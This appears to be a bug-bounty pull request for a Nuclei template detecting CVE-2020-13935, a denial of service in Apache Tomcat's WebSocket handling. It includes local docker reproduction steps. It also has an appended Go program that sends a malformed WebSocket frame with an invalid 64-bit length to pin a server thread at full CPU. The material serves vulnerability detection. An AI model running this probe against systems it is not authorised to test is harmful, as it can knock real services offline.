Template / PR Information

Wrote template for CVE-2020-13935 - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service

Checks:

  • If Tomcat WebSocket echo example page exists
  • If WebSocket echo example works
  • If there is a read timeout after sending the malformed WebSocket Message (target is vulnerable)
  • If there is no protocol error received (otherwise target is not vulnerable)

References:

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Spin up vulnerable Tomcat:

docker run --rm -it -p 8080:8080 --platform linux/amd64 --name tomcat_vulnerable --cpus 1 tomcat:8.0.51-jre8-slim

Check CPU usage - practically zero:


Run the template:

go run /Users/sttlr/tools/nuclei-dev/cmd/nuclei/main.go -code -itags dos -t /Users/sttlr/sttlr-nuclei-templates/CVE-2020-13935.yaml -u http://127.0.0.1:8080/ -v

Check CPU usage - 100%:

Additional Details (leave it blank if not applicable)

Run on dev nuclei - because code templates with engine set to go don’t work on the latest nuclei version v3.3.5 - see https://github.com/projectdiscovery/nuclei/issues/5759.

github.com/gorilla/websocket@v1.4.2 needs to be installed for the exploit to run - template tries to install in the first code block.

/claim #11019

Additional References:

Claim

Total prize pool: $50
Total paid: $50
Status: Approved
Submitted: November 07, 2024
Last updated: December 28, 2024

Contributors: Max (@sttlr), 100%

Sponsors: ProjectDiscovery (@projectdiscovery), $50 paid
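The four checks the PR lists (echo endpoint reachable, WebSocket upgrade works, read timeout after the malformed frame means vulnerable, a protocol-error close means not vulnerable) as an added Go example. This is not the PR's template, not Tomcat's code, and it uses only the standard library instead of gorilla/websocket. Assumptions not stated on the page: the malformed frame is one whose 64-bit extended payload length has its most significant bit set (a negative value once read into a Java signed long), the endpoint path /examples/websocket/echoProgrammatic from the Tomcat examples webapp, and all function names are the example's own.

```go
package main

import (
	"bufio"
	"crypto/rand"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

// Verdicts mirror the PR's last two checks.
const (
	Vulnerable    = "vulnerable: read timed out, server never reacted to the malformed frame"
	NotVulnerable = "not vulnerable: server answered with close code 1002 (protocol error)"
	Inconclusive  = "inconclusive"
)

// BuildMalformedFrame returns a masked client frame (FIN, text) whose 7-bit
// length field is 127, so the length is taken from the next 8 bytes, and whose
// 64-bit length has the top bit set. Assumption of this example: that is the
// "invalid payload length" behind CVE-2020-13935; the PR does not give the bytes.
func BuildMalformedFrame() []byte {
	frame := []byte{0x81, 0x80 | 127} // FIN=1 opcode=1; MASK=1 (clients must mask), len=127
	var ext [8]byte
	binary.BigEndian.PutUint64(ext[:], 1<<63) // 0x8000000000000000
	frame = append(frame, ext[:]...)
	return append(frame, 0xde, 0xad, 0xbe, 0xef) // masking key, no payload follows
}

// ServerFrame is the minimal view of an unmasked server-to-client frame.
type ServerFrame struct {
	Opcode  byte
	Payload []byte
}

// ParseServerFrame decodes one unmasked frame, rejecting the negative length
// that an unpatched parser would accept.
func ParseServerFrame(b []byte) (ServerFrame, error) {
	if len(b) < 2 {
		return ServerFrame{}, errors.New("frame too short")
	}
	if b[1]&0x80 != 0 {
		return ServerFrame{}, errors.New("server frames must not be masked")
	}
	length, off := uint64(b[1]&0x7f), 2
	switch length {
	case 126:
		if len(b) < 4 {
			return ServerFrame{}, errors.New("truncated 16-bit length")
		}
		length, off = uint64(binary.BigEndian.Uint16(b[2:4])), 4
	case 127:
		if len(b) < 10 {
			return ServerFrame{}, errors.New("truncated 64-bit length")
		}
		length, off = binary.BigEndian.Uint64(b[2:10]), 10
	}
	if length>>63 != 0 { // the validation the vulnerable versions lacked
		return ServerFrame{}, errors.New("invalid payload length (most significant bit set)")
	}
	if uint64(len(b)-off) < length {
		return ServerFrame{}, errors.New("truncated payload")
	}
	return ServerFrame{Opcode: b[0] & 0x0f, Payload: b[off : off+int(length)]}, nil
}

// CloseCode returns the status code of a close frame (opcode 8), or 0.
func CloseCode(f ServerFrame) uint16 {
	if f.Opcode != 0x8 || len(f.Payload) < 2 {
		return 0
	}
	return binary.BigEndian.Uint16(f.Payload[:2])
}

// Classify turns the read result after the malformed frame into a verdict.
func Classify(readErr error, resp []byte) string {
	var ne net.Error
	if errors.As(readErr, &ne) && ne.Timeout() {
		return Vulnerable
	}
	if readErr != nil {
		return Inconclusive // e.g. connection reset without a close frame
	}
	if f, err := ParseServerFrame(resp); err == nil && CloseCode(f) == 1002 {
		return NotVulnerable
	}
	return Inconclusive
}

// Probe does the HTTP upgrade by hand, sends the frame and waits up to timeout.
func Probe(addr, path string, timeout time.Duration) (string, error) {
	conn, err := net.DialTimeout("tcp", addr, timeout)
	if err != nil {
		return "", err
	}
	defer conn.Close()
	key := make([]byte, 16)
	if _, err := rand.Read(key); err != nil {
		return "", err
	}
	req := fmt.Sprintf("GET %s HTTP/1.1\r\nHost: %s\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"+
		"Sec-WebSocket-Key: %s\r\nSec-WebSocket-Version: 13\r\n\r\n", path, addr, base64.StdEncoding.EncodeToString(key))
	_ = conn.SetDeadline(time.Now().Add(timeout))
	if _, err := conn.Write([]byte(req)); err != nil {
		return "", err
	}
	br := bufio.NewReader(conn)
	resp, err := http.ReadResponse(br, nil)
	if err != nil {
		return "", err
	}
	if resp.StatusCode != http.StatusSwitchingProtocols {
		return "", fmt.Errorf("upgrade refused: %s", resp.Status) // echo endpoint missing or broken
	}
	if _, err := conn.Write(BuildMalformedFrame()); err != nil {
		return "", err
	}
	buf := make([]byte, 256)
	n, rerr := br.Read(buf)
	return Classify(rerr, buf[:n]), nil
}

func main() {
	addr := "127.0.0.1:8080"
	if len(os.Args) > 1 {
		addr = os.Args[1]
	}
	verdict, err := Probe(addr, "/examples/websocket/echoProgrammatic", 10*time.Second)
	if err != nil {
		fmt.Println("error:", err)
		os.Exit(1)
	}
	fmt.Println(verdict)
}
```

Against the docker container from the PR the probe reports the timeout verdict and the container's CPU climbs, as in the screenshots; against a patched Tomcat the server answers with a 1002 close frame and the verdict flips. Only one malformed frame is sent, because a single stuck WebSocket thread is enough to confirm the bug without exhausting the target.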